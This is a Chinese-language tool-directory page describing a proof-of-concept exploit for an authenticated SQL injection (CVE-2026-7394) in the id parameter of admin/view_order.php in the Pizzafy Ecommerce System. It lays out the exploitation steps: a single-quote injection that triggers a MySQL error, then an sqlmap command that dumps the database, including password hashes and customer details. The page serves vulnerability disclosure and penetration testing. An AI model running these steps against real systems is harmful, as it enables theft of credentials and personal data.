Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-7394-SQLI — CVE-2026-7394的概念验证漏洞利用程序,针对SourceCodester Pizzafy Ecommerce System 1.0中的SQL注入漏洞。演示了通过`admin/view_order.php`中的`id`参数进行经过身份验证的管理员SQL注入,能够完全导出数据库,包括用户凭据和个人身份信息(PII)。 | Kitploit
工具/GitHubGitHub/xmyronn/cve-2026-7394-sqli
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试数据库安全
GitHubxmyronn/cve-2026-7394-sqli

CVE-2026-7394-SQLI

CVE-2026-7394的概念验证漏洞利用程序,针对SourceCodester Pizzafy Ecommerce System 1.0中的SQL注入漏洞。演示了通过`admin/view_order.php`中的`id`参数进行经过身份验证的管理员SQL注入,能够完全导出数据库,包括用户凭据和个人身份信息(PII)。

查看仓库
24个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

SQL注入漏洞:Pizzafy电子商务系统 admin/view_order.php

详细信息

字段值
供应商SourceCodester
产品使用PHP和MySQL的Pizzafy电子商务系统
版本1.0
漏洞类型SQL注入
CWECWE-89
CVSSv3评分7.2(高)
攻击向量网络
是否需要认证是(管理员)
研究人员Xmyronn
日期2026-04-11

https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html


受影响组件

文件: Pizzafy/admin/view_order.php
参数: id(GET)


描述

Pizzafy电子商务系统1.0中的admin/view_order.php端点未能在将id GET参数传递给MySQL查询之前对其进行正确过滤。已通过身份验证的管理员可以操纵此参数注入任意SQL语句,从而导致数据库完全沦陷。


概念验证

步骤1 — 以管理员身份登录

访问:

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php

使用管理员凭据登录。

步骤2 — 导航至订单页面

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
截图 2026-04-11 212106

点击任意订单条目上的查看订单。 截图 2026-04-11 212116

步骤3 — 在Burp Suite中拦截请求

拦截到的GET请求如下所示: 截图 2026-04-11 212135

步骤4 — 触发SQL错误

将id=1修改为id=': 截图 2026-04-11 212145

root@kitploit:~
GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1

响应 — MySQL错误泄露:

root@kitploit:~
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15

步骤5 — 使用sqlmap进行利用

将请求保存为view_order.txt并运行:

root@kitploit:~
sqlmap -r view_order.txt --dump --batch
截图 2026-04-11 212406

sqlmap确认的注入类型:

类型描述
布尔盲注AND布尔盲注 — WHERE子句
错误注入MySQL >= 5.0 FLOOR错误注入
时间盲注MySQL >= 5.0.12 SLEEP
UNION查询通用UNION查询 — 11列

完整的数据库被导出:

root@kitploit:~
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings

暴露的敏感数据包括bcrypt密码哈希值、客户电子邮件、订单详情和系统配置。


影响

恶意管理员(或已获取管理员凭据的攻击者)可以:

  • 导出整个数据库,包括密码哈希值
  • 读取敏感客户PII(姓名、电子邮件、地址、电话号码)
  • 可能向数据库中写入数据

参考

  • SourceCodester — Pizzafy电子商务系统
  • CWE-89:SQL命令中特殊元素的未正确中和
下载工具